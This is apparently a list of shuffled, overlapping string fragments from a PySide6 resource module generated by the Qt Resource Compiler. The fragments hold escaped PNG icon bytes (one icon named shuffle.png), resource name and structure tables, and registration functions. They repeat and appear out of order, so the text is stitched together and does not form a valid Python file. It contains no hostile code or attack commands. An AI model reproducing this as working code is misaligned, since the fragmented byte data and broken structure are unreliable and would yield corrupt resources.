\\xa1\\xd4\\x0f\\xf0]QH\\xc2\\x95\\xb4\\xafh|\\xdf\\xd7\\x04\\ %\\xa5\\xc3\\xab\\xe7\\xab\\x02\\x86\\xc2\\xe2\\xd0\\x17\\xd5\\xc6:N\\ \\xb43J\\xd2x\\xf7\\x0b\\xe8K\\x18\\x01\\x85\\x97YX\\x11\\ !\\x84\\xc3\\xc56\\x02%=H\\xe1U\\x0c9h\\xd0.\\",
"\\x1b#\\x80\\x11\\xf1\\x04\\x02\\xcaZ\\xf0*\\xdd\\xc4\\x0a\\xc9\\x96\\ \\x16\\xa4\\x88b\\xc3uq(\\x99Dw\\x85\\xc2\\x10X\\x01\\ \\x8a\\x83\\xb7\\x9e \\xf2\\xbb\\x84\\x9d\\x9a\\x12\\x94-e\\xf9\\x7f\\ 0%\\xcb\\x16\\x0a\\xf8J\\x14\\xa6Mg\\xb3\\xf8D\\x14U\\ \\x01\\xb7T\\xaa\\xe3\\x14\\xd7S\\x8fL\\xcd!\\x9fz\\xf5t\\ 5q\\xa0\\xa7\\xbeiw\\xccoJ\\xd7\\xecW\\x8867\\ \\xdb\\x84\\x16\\xb2P\\xf3$\\xe8\\x97^Y^np\\xaa\\x0b\\ \\xa7\\x0e\\x03\\x83\\xc7q\\x8e\\xde\\xd1@$\\x1a\\xefL\\x1d<\\ \\x96x\\xfcl\\x8c=\\x98\\xda\\xfb\\x9c\\x05\\x02%\\x871\\xf9\\ \\xf7\\x93T\\xc5\\xe2\\x02\\xafY\\xd0\\x18\\xa5\\xaa\\x8c.\\xe6r\\ \\xdd\\x0b\\xf3\\xb9\\xb3\\x8d\\x1c\\xb1b&s\\x9f\\xb6\\xbc\\x7f<\\ \\xeb\\xd2\\x1f\\x01\\x06\\x00\\xd2\\x97^|\\x9f\\xc2\\xaf\\xc8\\x00\\x00\\",
"be lost! from PySide6 import QtCore qt_resource_data = b\"\\ \\x00\\x00\\x03m\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\",
"\\x00\\x00\\x01}\\xe0D>B\\ \" def qInitResources(): QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data) def qCleanupResources(): QtCore.qUnregisterResourceData(0x03, qt_resource_struct, qt_resource_name,",
"qt_resource_name = b\"\\ \\x00\\x05\\ \\x00o\\xa6S\\ \\x00i\\ \\x00c\\x00o\\x00n\\x00s\\ \\x00\\x0b\\ \\x0d\\xd7\\xa0\\xc7\\ \\x00s\\ \\x00h\\x00u\\x00f\\x00f\\x00l\\x00e\\x00.\\x00p\\x00n\\x00g\\ \\x00\\x0c\\ \\x07\\x90\\xdd\\xa7\\",
"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03q\\ \\x00\\x00\\x01}\\xe0D>B\\ \\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x01}\\xe0D>B\\ \" def qInitResources(): QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data) def",
"\\x5c\\x00\\xca\\xed_\\x02\\x0c\\x00\\xa6=o\\xdb2\\xe1%J\\ \\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\ \\x00\\x00\\x02\\xdb\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x02}IDATx\\xda\\x8c\\ \\x93\\xdfK\\x93Q\\x18\\xc7\\xbf\\xef\\xd9\\xd9t3s\\xad\\x9c\\ LG\\xcd\\xb5i\\x18\\x85\\x91\\xd4\\x8d\\x10\\x98AR\\x17A\\ ^ue\\x17\\x15A\\x7fB\\x16DPDw]G\\xd7\\",
"lost! from PySide6 import QtCore qt_resource_data = b\"\\ \\x00\\x00\\x03m\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\",
"\\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03q\\ \\x00\\x00\\x01}\\xe0D>B\\ \\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x01}\\xe0D>B\\ \" def qInitResources(): QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data) def qCleanupResources():",
"QB!\\xc27&\\xa2R\\xc0_VV[U\\xea\\x8b\\ \\xccgVY9\\xa3\\xb5sg\\xa0L\\xd7lQ\\x94\\x80\\ }\\x8e%\\xbeEb?\\x93z\\x96\\x9a=\\xdd\\xcd\\xc1\\x1b\\ \\xf7>\\xbeFA/\\x88\\xb2|Wh;\\xfb\\x81\\xeb\\xb0\\ \\x11\\xdfzhU\\xa5k\\xbb\\xb6\\x9c9\\xd6\\xd2T[\\xa9\\ *\\xaab3\\xcby\\xfb)6\\xbb\\x94\\xcc>\\x12\\x08\\x19\\ \\xc1\\x0a]\\xe6\\xa7\\xf2`YUC\\x92\\xa2\\x80\\x94I&\\ -\\xf4\\x85\\xd1;\\x9aNX\\xe3~\\x7fEI\\x9c\\x09J\\ &\\xa5A6\\xb6\\x90\\x89\\xc7\\xb50\\x91\\xa4A\\x0c\\xb6\\x91\\ w\\x0e\\xd1\\x80\\x87\\x85h.\\x07\\x1c$\\x9dL*\\x88\\xed\\ Z*uQ)\\x11\\x1b\\xf4\\xba:\\xcf$UA7(\\ ]H\\xe9Y\\xaf\\xcf\\xfb\\x15\\x83\\x060\\x9eW\\xaa\\x03Q\\ \\x8d\\x09\\xf6S\\xc3\\x00}y\\x19DyK\\xdf%\\xaf\\xa7\\",
"&\\x818\\x84\\xe71.j,\\x88-\\x0b\\xd2G\\xb8\\x02\\ 3\\xb9\\x9c\\xf1\\x8a\\xb6\\xb66L\\xcc\\xce\\xda;\\xb0Wd\\ ,X\\x81\\x1a\\x02\\x0f\\xaabA\\x99;\\xa0\\xc3\\xe9\\xd6V\\ ;\\xff^,\\xe2H:m\\xe3\\x89\\x99\\x19\\x22\\xd0e\\x81\\ \\xcf\\xdf\\x80\\xaex\\xe5\\x0e\\x08_\\x8a\\xea%\\xfa\\xac\\x9dL\\ >o\\x85b\\xb1\\x18>f2\\x9b\\x04\\xa6\\x22\\x1e\\x09\\xb0\\ \\x1b#\\x80\\x11\\xf1\\x04\\x02\\xcaZ\\xf0*\\xdd\\xc4\\x0a\\xc9\\x96\\ \\x16\\xa4\\x88b\\xc3uq(\\x99Dw\\x85\\xc2\\x10X\\x01\\ \\x8a\\x83\\xb7\\x9e \\xf2\\xbb\\x84\\x9d\\x9a\\x12\\x94-e\\xf9\\x7f\\ 0%\\xcb\\x16\\x0a\\xf8J\\x14\\xa6Mg\\xb3\\xf8D\\x14U\\ \\x01\\xb7T\\xaa\\xe3\\x14\\xd7S\\x8fL\\xcd!\\x9fz\\xf5t\\ 5q\\xa0\\xa7\\xbeiw\\xccoJ\\xd7\\xecW\\x8867\\",
"\\x05\\x8b`|T\\xa1*\\xa8\\xf5\\x8a (j\\xbd\\xd2\\x0b\\ \\x8dI\\x89\\xb76ib\\x93\\xddl2\\xbb;\\xeb\\x99\\x90\\ *\\xfa\\xe4\\xc0\\xb7s8\\xfb\\x9d33\\xdf9G\\xe8\\x1a\\ [\\x00\\x10\\x04XY\\x0ec`\\xdb6\\x18\\x9a\\x06\\x92,\\ \\x03\\x11\\xc5\\x82_QU\\xa4\\x09#h>\\xb3,+d\\ \\x99&X\\x94\\x82\\x04\\xff\\xb9L\\x0c \\x84\\x04\\xd1\\x0c\\x16\\ ]!\\xfe\\xe1\\x09\\xce\\x80\\xe3\\xd4\\xe1\\x9eFD\\x10\\xcf\\x11\\ sER\\xd0q\\x9c>\\xdc\\xb7:\\xb6]\\xc3\\xf0f\\xbd\\ ]\\xeb\\x827\\x9f|\\x19\\xc2\\x98B\\x12\\x09\\xaf\\xd3p\\xfc\\ @m}Z\\xb7\\xcd\\xef\\x89\\x5c\\xfd\\xcc\\xbc\\xb6\\x03y\\x0f\\ \\x91\\x10\\x10\\x05v\\xaa\\xb9\\xde[\\xb3\\xda\\xe7.w)\\xa2\\",
"D\\xb0L\\x1e\\x19\\xc0\\x8bjEu\\x80m\\x15\\x00\\xb1k\\ \\xb7\\xe6\\x0a}`b;N\\xe7\\xf1\\x08=\\x99g\\x91\\xe8\\ \\xcf\\xe5wS\\x8b\\x8c\\xd2+n\\x8f'\\x9a\\xbds\\xbf\\xdb\\ \\xd7\\xd4Xn\\xae\\xf5\\xbb-O\\x99\\x92#\\x12a\\x98\\xcc\\ `\\x00\\xb4XFA\\xec\\x19\\x19\\xc1\\xeb\\xb4\\xa3\\x1dG\\xbc\\ G\\x85\\xaf\\x93T\\xf8\\xb5\\xea.\\x01\\xf0mjD\\xf1v\\ \\xa1\\x9f\\xbf\\xbf\\x1cA\\xd6\\x0f\\x9cl\\x8c\\x8d\\x86\\xe6\\x907\\ \\x8e\\xe2>\\x16\\x84\\xa6\\xa38A\\x7fz\\xde\\x99\\xbd\\xfd\\xd7\\ \\x0c\\xc8-\\xbd\\xbfm\\xe4\\x9e/p\\x123\\xe3l\\xfa\\xd6\\ c{q\\x8a7a\\x012\\x1f8\\x84\\xab\\x08\\xb5\\xb8s\\ \\xbf\\xb8\\x92\\x80t\\x0e\\x1f\\x84\\x5cj\\x96\\xbd\\x19\\xe3\\xf3\\x92\\ A\\x18+\\x09H\\x91(\\xfd\\x03R\\xc4\\xcab|0\\x11\\ \\x5c\\x00\\xca\\xed_\\x02\\x0c\\x00\\xa6=o\\xdb2\\xe1%J\\",
"\\xb7\\xe6\\x0a}`b;N\\xe7\\xf1\\x08=\\x99g\\x91\\xe8\\ \\xcf\\xe5wS\\x8b\\x8c\\xd2+n\\x8f'\\x9a\\xbds\\xbf\\xdb\\ \\xd7\\xd4Xn\\xae\\xf5\\xbb-O\\x99\\x92#\\x12a\\x98\\xcc\\ `\\x00\\xb4XFA\\xec\\x19\\x19\\xc1\\xeb\\xb4\\xa3\\x1dG\\xbc\\ G\\x85\\xaf\\x93T\\xf8\\xb5\\xea.\\x01\\xf0mjD\\xf1v\\ \\xa1\\x9f\\xbf\\xbf\\x1cA\\xd6\\x0f\\x9cl\\x8c\\x8d\\x86\\xe6\\x907\\ \\x8e\\xe2>\\x16\\x84\\xa6\\xa38A\\x7fz\\xde\\x99\\xbd\\xfd\\xd7\\ \\x0c\\xc8-\\xbd\\xbfm\\xe4\\x9e/p\\x123\\xe3l\\xfa\\xd6\\ c{q\\x8a7a\\x012\\x1f8\\x84\\xab\\x08\\xb5\\xb8s\\ \\xbf\\xb8\\x92\\x80t\\x0e\\x1f\\x84\\x5cj\\x96\\xbd\\x19\\xe3\\xf3\\x92\\ A\\x18+\\x09H\\x91(\\xfd\\x03R\\xc4\\xcab|0\\x11\\ \\x5c\\x00\\xca\\xed_\\x02\\x0c\\x00\\xa6=o\\xdb2\\xe1%J\\ \\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\",
"\\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x02}IDATx\\xda\\x8c\\ \\x93\\xdfK\\x93Q\\x18\\xc7\\xbf\\xef\\xd9\\xd9t3s\\xad\\x9c\\ LG\\xcd\\xb5i\\x18\\x85\\x91\\xd4\\x8d\\x10\\x98AR\\x17A\\ ^ue\\x17\\x15A\\x7fB\\x16DPDw]G\\xd7\\ F\\x91A\\xdeu\\x11\\x95\\x11\\x1a\\x94\\x09\\x22-\\x86\\xe9\\x9c\\ ,$+u\\x93\\xf7=?z\\xce\\xd9\\xa6.\\x08:p\\ 8\\xcf\\xf9\\xf1|\\xdf\\xcf\\xf7<\\xefq&\\xef\\xc06\\xc7\\ \\xc1E\\x1a\\x12\\xf8\\xbf6\\xa75\\x1e\\xdd\\xdb\\xb8\\x09\\xae+\\ +\\xb4\\x90\\xec\\x1a\\xbc{}=?\\x0bGi\\x84\\xf6\\xb4\\",
"made in this file will be lost! from PySide6 import QtCore qt_resource_data =",
"]H\\xe9Y\\xaf\\xcf\\xfb\\x15\\x83\\x060\\x9eW\\xaa\\x03Q\\ \\x8d\\x09\\xf6S\\xc3\\x00}y\\x19DyK\\xdf%\\xaf\\xa7\\ d\\xb0\\xbaiC[\\xba\\xbd=\\x10a.REL;\\ \\xf1\\xf2\\x83nl\\xda<-\\x06\\xd6I.\\xc1\\xae\\xa2Z\\ 6h\\x199\\xb6\\xaf\\x7fwcx2\\xcc\\x93P\\xc6X\\ T(=q\\xf5\\xd5\\x91\\xd3\\xfd\\xc1\\xdbi\\x05L,m\\ \\xb5m\\x98t\\xe2\\xd1\\x0f\\x82?\\xd5\\xc3\\x07\\x96\\x16\\x05\\x97\\ D\\xb0L\\x1e\\x19\\xc0\\x8bjEu\\x80m\\x15\\x00\\xb1k\\ \\xb7\\xe6\\x0a}`b;N\\xe7\\xf1\\x08=\\x99g\\x91\\xe8\\ \\xcf\\xe5wS\\x8b\\x8c\\xd2+n\\x8f'\\x9a\\xbds\\xbf\\xdb\\ \\xd7\\xd4Xn\\xae\\xf5\\xbb-O\\x99\\x92#\\x12a\\x98\\xcc\\ `\\x00\\xb4XFA\\xec\\x19\\x19\\xc1\\xeb\\xb4\\xa3\\x1dG\\xbc\\ G\\x85\\xaf\\x93T\\xf8\\xb5\\xea.\\x01\\xf0mjD\\xf1v\\",
"5q\\xa0\\xa7\\xbeiw\\xccoJ\\xd7\\xecW\\x8867\\ \\xdb\\x84\\x16\\xb2P\\xf3$\\xe8\\x97^Y^np\\xaa\\x0b\\ \\xa7\\x0e\\x03\\x83\\xc7q\\x8e\\xde\\xd1@$\\x1a\\xefL\\x1d<\\ \\x96x\\xfcl\\x8c=\\x98\\xda\\xfb\\x9c\\x05\\x02%\\x871\\xf9\\ \\xf7\\x93T\\xc5\\xe2\\x02\\xafY\\xd0\\x18\\xa5\\xaa\\x8c.\\xe6r\\ \\xdd\\x0b\\xf3\\xb9\\xb3\\x8d\\x1c\\xb1b&s\\x9f\\xb6\\xbc\\x7f<\\ \\xeb\\xd2\\x1f\\x01\\x06\\x00\\xd2\\x97^|\\x9f\\xc2\\xaf\\xc8\\x00\\x00\\ \\x00\\x00IEND\\xaeB`\\x82\\ \" qt_resource_name = b\"\\ \\x00\\x05\\",
"LG\\xcd\\xb5i\\x18\\x85\\x91\\xd4\\x8d\\x10\\x98AR\\x17A\\ ^ue\\x17\\x15A\\x7fB\\x16DPDw]G\\xd7\\ F\\x91A\\xdeu\\x11\\x95\\x11\\x1a\\x94\\x09\\x22-\\x86\\xe9\\x9c\\ ,$+u\\x93\\xf7=?z\\xce\\xd9\\xa6.\\x08:p\\ 8\\xcf\\xf9\\xf1|\\xdf\\xcf\\xf7<\\xefq&\\xef\\xc06\\xc7\\ \\xc1E\\x1a\\x12\\xf8\\xbf6\\xa75\\x1e\\xdd\\xdb\\xb8\\x09\\xae+\\ +\\xb4\\x90\\xec\\x1a\\xbc{}=?\\x0bGi\\x84\\xf6\\xb4\\ #\\x18\\x8e\\x83\\xf9\\x02\\xb5\\xa9\\x9cc\\xf2\\xe1\\x85\\xdb#\\xee\\ Py\\xaa\\xd4\\xe6\\x16k\\x88\\xa6)q?\\xdc\\xd5\\x02\\xd6\\ \\xf3_0\\xfe\\xf6\\x0d\\x9c\\xc4\\x99\\x9a|\\xc7\\xef\\xc7\\x07\\xef\\ \\xf4\\xd1y\\xb5\\xef2M\\x97\\xb8\\xd4[\\x02J\\x0ah\\xcf\\ \\x03\\xaf\\x0b#\\xdc\\xd9\\x8bX\\xc1A{\\xef%\\x84B!\\ 0\\xc66\\x0f\\xf6\\x9f\\xbc6@\\xc3\\xc0\\xf9\\xe1\\xe1\\xab\\x5c\\",
"version 6.2.2 # WARNING! All changes made in this file will be lost!",
"= b\"\\ \\x00\\x00\\x03m\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x03\\x0fIDATx\\xda\\x8c\\ S[k\\x13A\\x14>;{K\\xd3&\\xbd\\xc4Vk\\ \\xbc\\xa4\\x17\\xac\\xb4\\xd6V#R+j\\xa5*\\x0aZh\\ \\xc1\\xe2\\x83\\x0f>\\xf5A,\\x14\\xfa'\\x04\\x1f\\x14\\x04\\xa1\\",
"&\\xa5A6\\xb6\\x90\\x89\\xc7\\xb50\\x91\\xa4A\\x0c\\xb6\\x91\\ w\\x0e\\xd1\\x80\\x87\\x85h.\\x07\\x1c$\\x9dL*\\x88\\xed\\ Z*uQ)\\x11\\x1b\\xf4\\xba:\\xcf$UA7(\\ ]H\\xe9Y\\xaf\\xcf\\xfb\\x15\\x83\\x060\\x9eW\\xaa\\x03Q\\ \\x8d\\x09\\xf6S\\xc3\\x00}y\\x19DyK\\xdf%\\xaf\\xa7\\ d\\xb0\\xbaiC[\\xba\\xbd=\\x10a.REL;\\ \\xf1\\xf2\\x83nl\\xda<-\\x06\\xd6I.\\xc1\\xae\\xa2Z\\ 6h\\x199\\xb6\\xaf\\x7fwcx2\\xcc\\x93P\\xc6X\\ T(=q\\xf5\\xd5\\x91\\xd3\\xfd\\xc1\\xdbi\\x05L,m\\ \\xb5m\\x98t\\xe2\\xd1\\x0f\\x82?\\xd5\\xc3\\x07\\x96\\x16\\x05\\x97\\ D\\xb0L\\x1e\\x19\\xc0\\x8bjEu\\x80m\\x15\\x00\\xb1k\\ \\xb7\\xe6\\x0a}`b;N\\xe7\\xf1\\x08=\\x99g\\x91\\xe8\\ \\xcf\\xe5wS\\x8b\\x8c\\xd2+n\\x8f'\\x9a\\xbds\\xbf\\xdb\\",
"3\\xb9\\x9c\\xf1\\x8a\\xb6\\xb66L\\xcc\\xce\\xda;\\xb0Wd\\ ,X\\x81\\x1a\\x02\\x0f\\xaabA\\x99;\\xa0\\xc3\\xe9\\xd6V\\ ;\\xff^,\\xe2H:m\\xe3\\x89\\x99\\x19\\x22\\xd0e\\x81\\ \\xcf\\xdf\\x80\\xaex\\xe5\\x0e\\x08_\\x8a\\xea%\\xfa\\xac\\x9dL\\ >o\\x85b\\xb1\\x18>f2\\x9b\\x04\\xa6\\x22\\x1e\\x09\\xb0\\ \\x1b#\\x80\\x11\\xf1\\x04\\x02\\xcaZ\\xf0*\\xdd\\xc4\\x0a\\xc9\\x96\\ \\x16\\xa4\\x88b\\xc3uq(\\x99Dw\\x85\\xc2\\x10X\\x01\\ \\x8a\\x83\\xb7\\x9e \\xf2\\xbb\\x84\\x9d\\x9a\\x12\\x94-e\\xf9\\x7f\\ 0%\\xcb\\x16\\x0a\\xf8J\\x14\\xa6Mg\\xb3\\xf8D\\x14U\\ \\x01\\xb7T\\xaa\\xe3\\x14\\xd7S\\x8fL\\xcd!\\x9fz\\xf5t\\ 5q\\xa0\\xa7\\xbeiw\\xccoJ\\xd7\\xecW\\x8867\\ \\xdb\\x84\\x16\\xb2P\\xf3$\\xe8\\x97^Y^np\\xaa\\x0b\\",
"T(=q\\xf5\\xd5\\x91\\xd3\\xfd\\xc1\\xdbi\\x05L,m\\ \\xb5m\\x98t\\xe2\\xd1\\x0f\\x82?\\xd5\\xc3\\x07\\x96\\x16\\x05\\x97\\ D\\xb0L\\x1e\\x19\\xc0\\x8bjEu\\x80m\\x15\\x00\\xb1k\\ \\xb7\\xe6\\x0a}`b;N\\xe7\\xf1\\x08=\\x99g\\x91\\xe8\\ \\xcf\\xe5wS\\x8b\\x8c\\xd2+n\\x8f'\\x9a\\xbds\\xbf\\xdb\\ \\xd7\\xd4Xn\\xae\\xf5\\xbb-O\\x99\\x92#\\x12a\\x98\\xcc\\ `\\x00\\xb4XFA\\xec\\x19\\x19\\xc1\\xeb\\xb4\\xa3\\x1dG\\xbc\\ G\\x85\\xaf\\x93T\\xf8\\xb5\\xea.\\x01\\xf0mjD\\xf1v\\ \\xa1\\x9f\\xbf\\xbf\\x1cA\\xd6\\x0f\\x9cl\\x8c\\x8d\\x86\\xe6\\x907\\ \\x8e\\xe2>\\x16\\x84\\xa6\\xa38A\\x7fz\\xde\\x99\\xbd\\xfd\\xd7\\ \\x0c\\xc8-\\xbd\\xbfm\\xe4\\x9e/p\\x123\\xe3l\\xfa\\xd6\\ c{q\\x8a7a\\x012\\x1f8\\x84\\xab\\x08\\xb5\\xb8s\\ \\xbf\\xb8\\x92\\x80t\\x0e\\x1f\\x84\\x5cj\\x96\\xbd\\x19\\xe3\\xf3\\x92\\",
"\" qt_resource_struct = b\"\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03q\\ \\x00\\x00\\x01}\\xe0D>B\\ \\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x01}\\xe0D>B\\ \"",
"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03q\\ \\x00\\x00\\x01}\\xe0D>B\\ \\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x01}\\xe0D>B\\ \" def qInitResources(): QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name,",
"#\\x18\\x8e\\x83\\xf9\\x02\\xb5\\xa9\\x9cc\\xf2\\xe1\\x85\\xdb#\\xee\\ Py\\xaa\\xd4\\xe6\\x16k\\x88\\xa6)q?\\xdc\\xd5\\x02\\xd6\\ \\xf3_0\\xfe\\xf6\\x0d\\x9c\\xc4\\x99\\x9a|\\xc7\\xef\\xc7\\x07\\xef\\ \\xf4\\xd1y\\xb5\\xef2M\\x97\\xb8\\xd4[\\x02J\\x0ah\\xcf\\ \\x03\\xaf\\x0b#\\xdc\\xd9\\x8bX\\xc1A{\\xef%\\x84B!\\ 0\\xc66\\x0f\\xf6\\x9f\\xbc6@\\xc3\\xc0\\xf9\\xe1\\xe1\\xab\\x5c\\ n\\x11\\xf8\\xb4\\x940\\xdd6!\\xf0b\\xa9\\x84\\xb1\\xd7?\\ \\xa1\\xd4\\x0f\\xf0]QH\\xc2\\x95\\xb4\\xafh|\\xdf\\xd7\\x04\\ %\\xa5\\xc3\\xab\\xe7\\xab\\x02\\x86\\xc2\\xe2\\xd0\\x17\\xd5\\xc6:N\\ \\xb43J\\xd2x\\xf7\\x0b\\xe8K\\x18\\x01\\x85\\x97YX\\x11\\ !\\x84\\xc3\\xc56\\x02%=H\\xe1U\\x0c9h\\xd0.\\ \\xd6\\x96V\\xa0\\xe9p\\x7f\\x84C\\x16\\x94%\\xec\\x0f\\x92\\x90\\ \\xdea\\x04\\xd8v\\x0b\\x5c\\x09\\x22\\x10e\\x02\\x87\\xf9\\x10T\\",
"\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x01}\\xe0D>B\\ \" def qInitResources(): QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data) def qCleanupResources(): QtCore.qUnregisterResourceData(0x03, qt_resource_struct,",
"\\x00\\x00IEND\\xaeB`\\x82\\ \" qt_resource_name = b\"\\ \\x00\\x05\\ \\x00o\\xa6S\\ \\x00i\\ \\x00c\\x00o\\x00n\\x00s\\ \\x00\\x0b\\ \\x0d\\xd7\\xa0\\xc7\\ \\x00s\\ \\x00h\\x00u\\x00f\\x00f\\x00l\\x00e\\x00.\\x00p\\x00n\\x00g\\",
"by: The Resource Compiler for Qt version 6.2.2 # WARNING! All changes made",
"0\\xc66\\x0f\\xf6\\x9f\\xbc6@\\xc3\\xc0\\xf9\\xe1\\xe1\\xab\\x5c\\ n\\x11\\xf8\\xb4\\x940\\xdd6!\\xf0b\\xa9\\x84\\xb1\\xd7?\\ \\xa1\\xd4\\x0f\\xf0]QH\\xc2\\x95\\xb4\\xafh|\\xdf\\xd7\\x04\\ %\\xa5\\xc3\\xab\\xe7\\xab\\x02\\x86\\xc2\\xe2\\xd0\\x17\\xd5\\xc6:N\\ \\xb43J\\xd2x\\xf7\\x0b\\xe8K\\x18\\x01\\x85\\x97YX\\x11\\ !\\x84\\xc3\\xc56\\x02%=H\\xe1U\\x0c9h\\xd0.\\ \\xd6\\x96V\\xa0\\xe9p\\x7f\\x84C\\x16\\x94%\\xec\\x0f\\x92\\x90\\ \\xdea\\x04\\xd8v\\x0b\\x5c\\x09\\x22\\x10e\\x02\\x87\\xf9\\x10T\\ .\\xae\\xa4\\x1a\\xed|qm\\x05=\\x1d\\x1d6\\x1e\\x9f\\x9e\\ &\\x818\\x84\\xe71.j,\\x88-\\x0b\\xd2G\\xb8\\x02\\ 3\\xb9\\x9c\\xf1\\x8a\\xb6\\xb66L\\xcc\\xce\\xda;\\xb0Wd\\ ,X\\x81\\x1a\\x02\\x0f\\xaabA\\x99;\\xa0\\xc3\\xe9\\xd6V\\ ;\\xff^,\\xe2H:m\\xe3\\x89\\x99\\x19\\x22\\xd0e\\x81\\",
"(Python 3) # Created by: object code # Created by: The Resource Compiler",
"\\x00\\x00\\x03m\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x03\\x0fIDATx\\xda\\x8c\\ S[k\\x13A\\x14>;{K\\xd3&\\xbd\\xc4Vk\\ \\xbc\\xa4\\x17\\xac\\xb4\\xd6V#R+j\\xa5*\\x0aZh\\ \\xc1\\xe2\\x83\\x0f>\\xf5A,\\x14\\xfa'\\x04\\x1f\\x14\\x04\\xa1\\ \\x05\\x8b`|T\\xa1*\\xa8\\xf5\\x8a (j\\xbd\\xd2\\x0b\\",
"\\x00\\x00\\x02\\xdb\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x02}IDATx\\xda\\x8c\\ \\x93\\xdfK\\x93Q\\x18\\xc7\\xbf\\xef\\xd9\\xd9t3s\\xad\\x9c\\ LG\\xcd\\xb5i\\x18\\x85\\x91\\xd4\\x8d\\x10\\x98AR\\x17A\\ ^ue\\x17\\x15A\\x7fB\\x16DPDw]G\\xd7\\ F\\x91A\\xdeu\\x11\\x95\\x11\\x1a\\x94\\x09\\x22-\\x86\\xe9\\x9c\\ ,$+u\\x93\\xf7=?z\\xce\\xd9\\xa6.\\x08:p\\",
"}\\x8e%\\xbeEb?\\x93z\\x96\\x9a=\\xdd\\xcd\\xc1\\x1b\\ \\xf7>\\xbeFA/\\x88\\xb2|Wh;\\xfb\\x81\\xeb\\xb0\\ \\x11\\xdfzhU\\xa5k\\xbb\\xb6\\x9c9\\xd6\\xd2T[\\xa9\\ *\\xaab3\\xcby\\xfb)6\\xbb\\x94\\xcc>\\x12\\x08\\x19\\ \\xc1\\x0a]\\xe6\\xa7\\xf2`YUC\\x92\\xa2\\x80\\x94I&\\ -\\xf4\\x85\\xd1;\\x9aNX\\xe3~\\x7fEI\\x9c\\x09J\\ &\\xa5A6\\xb6\\x90\\x89\\xc7\\xb50\\x91\\xa4A\\x0c\\xb6\\x91\\ w\\x0e\\xd1\\x80\\x87\\x85h.\\x07\\x1c$\\x9dL*\\x88\\xed\\ Z*uQ)\\x11\\x1b\\xf4\\xba:\\xcf$UA7(\\ ]H\\xe9Y\\xaf\\xcf\\xfb\\x15\\x83\\x060\\x9eW\\xaa\\x03Q\\ 